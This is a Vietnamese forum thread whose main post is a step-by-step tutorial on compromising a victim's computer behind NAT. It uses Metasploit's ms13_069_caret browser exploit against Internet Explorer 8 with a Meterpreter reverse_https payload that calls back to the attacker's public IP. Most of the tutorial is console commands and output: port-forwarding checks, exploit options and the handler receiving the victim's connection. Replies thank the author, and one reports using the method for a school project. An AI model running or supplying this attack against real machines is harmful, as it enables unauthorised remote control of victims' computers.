Hướng dẫn hacking một máy tính thông qua Internet
Hi all, Hôm nay mình đã trờ lại, và trong bài viết nhở này chúng ta sẽ xem xét làm thế nào để cấu hình một cách chính xác Meterpreter Payload và làm chúng hoạt động khi tấn công của bạn là phía sau NAT. Thậm chí nếu cả 2 mục tiêu là: hacker và nạn nhân đều phía sau NAT. Có lẽ tôi sẽ khai thác một trình duyệt để chứng minh điều này. Mô hình: Như các bạn có thể nhìn thấy. Cả hacker và nạn nhân là phía sau NAT, làm thế nào để đột nhập vào máy này bây giờ ???
Chỉnh sửa lần cuối bởi người điều hành: 03/12/2015
Tiếp nữa đi bác. giả dụ trong trường hợp dùng win xp, win 7, win 8, win 8.1 và win 10 thì cách thức tấn công như thế nào bác. em đã làm đồ án trên win xp và win 7 đã thành công nhờ hướng dẫn của bác
Tiếp theo: Đầu tiên chúng ta cần xác minh rằng forwarding đang làm việc. Mã:
Chúng ta sẽ giả định rằng đối phương có khả khả năng kết nối đến Internet qua Port 80 và 443
Tôi sẽ sử dụng Kali Linux như những kẻ tấn công, Metasploit thì đã có sẵn trên kali linux. Vui lòng chắc rằng bạn đã cập nhật Metasploit phiên bản mới nhất trên Kali Linux.
Tôi sẽ khác thác trình duyệt Inetnet Explorer 8 vì nó đã lỗi thời và chứa rất nhiều
lỗ hỏng bảo mật dễ bị tấn công
Ý tưởng là để cấu hình Router/Firewall để traffic tới các IP Public [1.1.1.1] của Router sẽ được forward đến IP Hacker [192.168.0.187] trên các cổng 80 và 443. Vui lòng chắc chắn để kiểm tra xem cổng 80 và 443 không được sử dụng bởi Router/Firewall.
Trên Kali tạo một tập tin hmtl nhở và lưu nó dưới /tmp
Từ thư mục chứa các file test.html chạy lệnh python này.
[email protected]:/tmp# python -m SimpleHTTPServer 443
Serving HTTP on 0.0.0.0 port 443 ...
192.168.1.26 - - [04/Dec/2015 10:29:24] "GET /test.html HTTP/1.1" 200 -
192.168.1.26 - - [04/Dec/2015 10:29:24] code 404, message File not found
192.168.1.26 - - [04/Dec/2015 10:29:24] "GET /favicon.ico HTTP/1.1" 404 -
192.168.1.26 - - [04/Dec/2015 10:29:24] code 404, message File not found
192.168.1.26 - - [04/Dec/2015 10:29:24] "GET /favicon.ico HTTP/1.1" 404 -
Nếu bây giờ bạn kết nối đến //192.168.1.26:443/test.html bạn sẽ thấy:
Bây giờ. Trên một máy tính bất kỳ ngoài Inetnet gõ //1.1.1.1/test.html [ thay IP 1.1.1.1 bằng IP Public của bạn ] nếu bạn nhìn thấy trang này chứng tở forwarding đã được cấu hình chính xác và đang làm việc tốt. nếu không bạn cần kiểm tra lại cấu hình forwarding . Hướng dẫn cấu hình nằm ngoài phạm vi bài viết tôi để cho các bạn tự tìm hiểu
Lưu ý: forwarding thì đang làm việc chính xác cho cả 2 cổng 80 và 443. test thêm điều này.
Mã:
[email protected]:~# cd /tmp
[email protected]:/tmp# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
192.168.1.26 - - [04/Dec/2015 11:01:15] "GET /test.html HTTP/1.1" 200 -
Metasploit ConfigrurationTôi sẽ sử dụng ms13_069_caret.rb để khai thác.
Mã:
msf > use exploit/windows/browser/ms13_069_caret
msf exploit[ms13_069_caret] > show options
Module options [exploit/windows/browser/ms13_069_caret]:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate [default is randomly generated]
URIPATH no The URI to use for this exploit [default is random]
Exploit target:
Id Name
-- ----
0 IE 8 on Windows XP SP3
msf exploit[ms13_069_caret] > set SRVPORT 80
SRVPORT => 80
msf exploit[ms13_069_caret] > set URIPATH /
URIPATH => /
msf exploit[ms13_069_caret] >
Kế tiếp chúng ta sẽ lựa chọn meterpreter reverse_https payload for windows. Chạy show options một lần nữa và chúng ta sẽ nhìn thấy điều này.
Mã:
msf exploit[ms13_069_caret] > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit[ms13_069_caret] > show options
Module options [exploit/windows/browser/ms13_069_caret]:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate [default is randomly generated]
URIPATH / no The URI to use for this exploit [default is random]
Payload options [windows/meterpreter/reverse_https]:
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique [Accepted: ', seh, thread, process, none]
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
Exploit target:
Id Name
-- ----
0 IE 8 on Windows XP SP3
msf exploit[ms13_069_caret] >
msf exploit[ms13_069_caret] > set
LPORT 443LPORT => 443
msf exploit[ms13_069_caret] > set LHOST 1.55.109.2. [ YOUR IP PUBLIC]
LHOST => 1.1.1.1
Mã:
Chúng ta có thể nói cho nó biết để lắng nghe trên IP LAN
[CODE]
msf exploit[ms13_069_caret] > set ReverseListenerBindAddress 192.168.1.26
ReverseListenerBindAddress => 192.168.1.26
Mã:
msf exploit[ms13_069_caret] > exploit
[*]Exploit running as background job.
[*]Started HTTPS reverse handler on //192.168.1.26:443/
[*]Using URL: //0.0.0.0:80/
[*]Local IP: //192.168.1.26:80/
[*]Server started.
msf exploit[ms13_069_caret] >
Nếu bây giờ chúng ta sử dụng IE 8 trên máy nạn nhân và kết nối với IP Public của Hacker. Chúng ta sẽ thấy điều này.
Mã:
msf exploit[ms13_069_caret] >
[*]2.2.2.2 ms13_069_caret - Sending exploit...
[*]2.2.2.2 ms13_069_caret - Sending exploit...
[*]2.2.2.2:53893 Request received for /NtFT...
[*]2.2.2.2:53893 Staging connection for target /NtFT received...
[*]Patched user-agent at offset 663128...
[*]Patched transport at offset 662792...
[*]Patched URL at offset 662856...
[*]Patched Expiration Timeout at offset 663728...
[*]Patched Communication Timeout at offset 663732...
Note:
SRVHOST : 0.0.0.0
SRVPORT : set to the port where you want to host the
browser exploit
LHOST : the attacker public IP
LPORT : set to the port where you want to serve the Meterpreter handler
ReverseListenerBindAddress : LAN IP [optional]
Chỉnh sửa lần cuối bởi người điều hành: 28/05/2020
Mệt rồi! Tạm thời tôi đi ngủ cái đã. mai rảnh sẽ xem lại có bị hoat mắt gõ sai chỗ nào không
duc_2712;n53695 đã viết: Tiếp nữa đi bác. giả dụ trong trường hợp dùng win xp, win 7, win 8, win 8.1 và win 10 thì cách thức tấn công như thế nào bác. em đã làm đồ án trên win xp và win 7 đã thành công nhờ hướng dẫn của bác Bạn có thể tham khảo bài viết của mình ở trên nhé. Nhưng bạn đã làm đồ án thành công trên win xp và win
7 nhờ hướng dẫn của mình. Mình đang tò mò là không biết bài nào nhỉ ? trên diễn đàn có rất nhiều bài của mình
Bài này good Thanks...........................
cần lắm một bài hướng dẫn chất lượng
Sao mình k thấy link hay bài hướng dẫn gì hết mà bạn.
tieulyit;n53887 đã viết: Sao mình k thấy link hay bài hướng dẫn gì hết mà bạn. Bài hướng dẫn của mình ở trên rồi mà. Bạn muốn hỏi link hay bài hướng dẫn nào mới được ?
Điều kiện hoàn hảo tuyệt đối: IE
Imposible
Bài viết hay, thanks bác